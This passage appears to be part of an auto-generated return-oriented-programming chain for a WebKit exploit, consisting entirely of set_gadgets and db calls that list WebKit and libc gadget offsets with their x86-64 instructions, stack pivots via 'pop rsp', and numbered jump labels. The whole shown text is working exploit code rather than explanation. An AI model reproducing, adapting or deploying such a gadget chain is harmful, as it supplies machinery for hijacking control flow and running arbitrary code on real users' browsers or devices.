webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+447920, //L9559
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+447936, //L9560
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9559:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9560:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9561:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9562:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+448064, //L9564
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+448048, //L9563
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9563:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9564:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+448144, //L9565
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9565:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9567:
db([4294967252, 4294967295]); // -0x2c
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+448264, //L9570
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+448248, //L9568
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9568:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9570:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+448440, //L9573
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+448456, //L9574
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+448408, //L9571
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+448424, //L9572
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9571:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9572:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9573:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9574:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+448616, //L9578
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+448584, //L9576
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+448600, //L9577
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9575:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L9576:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9577:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9578:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+448720, //L9580
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+448704, //L9579
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9579:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9580:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+448800, //L9581
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9581:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9583:
db([4294967232, 4294967295]); // -0x40
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+448920, //L9586
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+448904, //L9584
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9584:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9586:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+449064, //L9589
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+449032, //L9587
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+449048, //L9588
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9587:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9588:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9589:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+449144, //L9590
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L9590:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9591:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9592:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+449288, //L9593
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+449320, //L9595
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+449304, //L9594
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9593:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9594:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9595:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+449432, //L9597
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L9596:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9597:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+449536, //L9598
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L9598:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9599:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9600:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+449664, //L9602
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+449648, //L9601
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9601:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9602:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+449744, //L9603
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9603:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9605:
db([4294967232, 4294967295]); // -0x40
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+449864, //L9608
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+449848, //L9606
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9606:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9608:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+449976, //L9609
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+450008, //L9611
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+449992, //L9610
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9609:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9610:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9611:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+450184, //L9613
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+450200, //L9614
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+450168, //L9612
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L9612:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9613:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9614:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+450312, //L9616
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+450360, //L9619
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+450328, //L9617
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L9616:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9617:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9618:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9619:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+450472, //L9620+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+450464, //L9620
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L9620:
db([0, 0]); // 0x0
set_gadgets([
ropchain+450488, //L9620+24
ropchain+450816, //L9615
libc_base+764760, //pop rsi
ropchain+450528, //L9621
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9621:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9623:
db([4294967232, 4294967295]); // -0x40
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+450648, //L9626
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+450632, //L9624
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9624:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9626:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+450792, //L9630
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+450760, //L9628
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+450776, //L9629
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9628:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9629:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9630:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+451376, //L9627
//L9615:
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+450856, //L9631
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L9631:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9632:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9633:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+450984, //L9635
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+450968, //L9634
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9634:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9635:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+451064, //L9636
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9636:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9638:
db([4294967232, 4294967295]); // -0x40
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+451184, //L9641
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+451168, //L9639
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9639:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9641:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+451296, //L9642
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+451328, //L9644
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+451312, //L9643
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9642:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9643:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9644:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
//L9627:
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+451448, //L9645
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9645:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9647:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+451568, //L9650
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+451552, //L9648
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9648:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9650:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+451712, //L9653
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+451680, //L9651
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+451696, //L9652
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9651:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9652:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9653:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+451792, //L9654
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9654:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9656:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+451912, //L9659
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+451896, //L9657
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9657:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9659:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+452056, //L9662
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+452024, //L9660
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+452040, //L9661
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9660:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9661:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9662:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+452136, //L9663
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9663:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9665:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+452256, //L9668
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+452240, //L9666
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9666:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9668:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+452400, //L9671
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+452368, //L9669
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+452384, //L9670
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9669:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9670:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9671:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+452480, //L9672
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9672:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9674:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+452600, //L9677
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+452584, //L9675
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9675:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9677:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+452744, //L9680
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+452712, //L9678
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+452728, //L9679
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9678:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9679:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9680:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L9682:
ropchain+452848, //L9681
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+275424, //__ntoa_long
//L9681:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967216, 4294967295]); // -0x50
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+452920, //L9683
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9683:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9685:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+453000, //L9687
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9687:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+466440, //L9686
//L9504:
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9689:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9691:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+453160, //L9694
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+453144, //L9692
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9692:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9694:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+453336, //L9697
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+453352, //L9698
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+453304, //L9695
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+453320, //L9696
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9695:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9696:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9697:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9698:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+453448, //L9700
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+453432, //L9699
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9699:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9700:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L9701:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L9702:
db([6, 0]); // 0x6
set_gadget(libc_base+763368,); //pop rcx
//L9703:
db([6, 0]); // 0x6
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+453648, //L9705
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9705:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+453704, //L9706
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9706:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+453840, //L9710
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+453824, //L9709
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9708:
